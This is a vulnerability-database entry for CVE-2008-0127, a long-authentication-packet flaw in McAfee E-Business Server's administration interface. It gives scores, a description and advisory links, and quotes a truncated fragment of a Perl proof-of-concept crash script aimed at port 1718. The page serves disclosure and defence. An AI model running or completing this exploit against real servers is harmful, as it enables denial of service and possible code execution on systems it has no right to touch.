Published: 10/01/2008 Updated: 15/10/2018

CVSS v2 Base Score: 8.8 | Impact Score: 9.2 | Exploitability Score: 8.6

VMScore: 885

Vector: AV:N/AC:M/Au:N/C:N/I:C/A:C

The administration interface in McAfee E-Business Server 8.5.2 and previous versions allows remote malicious users to cause a denial of service (crash) and execute arbitrary code via a long initial authentication packet.

Vulnerable Product	Search on Vulmon	Subscribe to Product
mcafee e-business server

#!/usr/bin/perl # # # McAfee(R) E-Business Server(TM) 852 Remote preauth crash (PoC) # # - tested on Windows and Linux # # # Leon Juranic <leonjuranic@infigohr>, # Infigo IS <wwwinfigohr/en/> # use IO::Socket; $saddr = "19216813"; $sport = 1718; $exp1 = "\x01\x3f\x2f\x05\x25\x2a" "A" x 69953;; print "> Sending ...

CWE-119 https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=614472 http://www.securityfocus.com/bid/27197 http://securitytracker.com/id?1019170 http://secunia.com/advisories/28408 http://securityreason.com/securityalert/3530 http://www.vupen.com/english/advisories/2008/0087 https://exchange.xforce.ibmcloud.com/vulnerabilities/39563 https://exchange.xforce.ibmcloud.com/vulnerabilities/39561 https://www.exploit-db.com/exploits/4878 http://www.securityfocus.com/archive/1/486035/100/0/threaded http://www.securityfocus.com/archive/1/485992/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/4878/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2008-0127

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect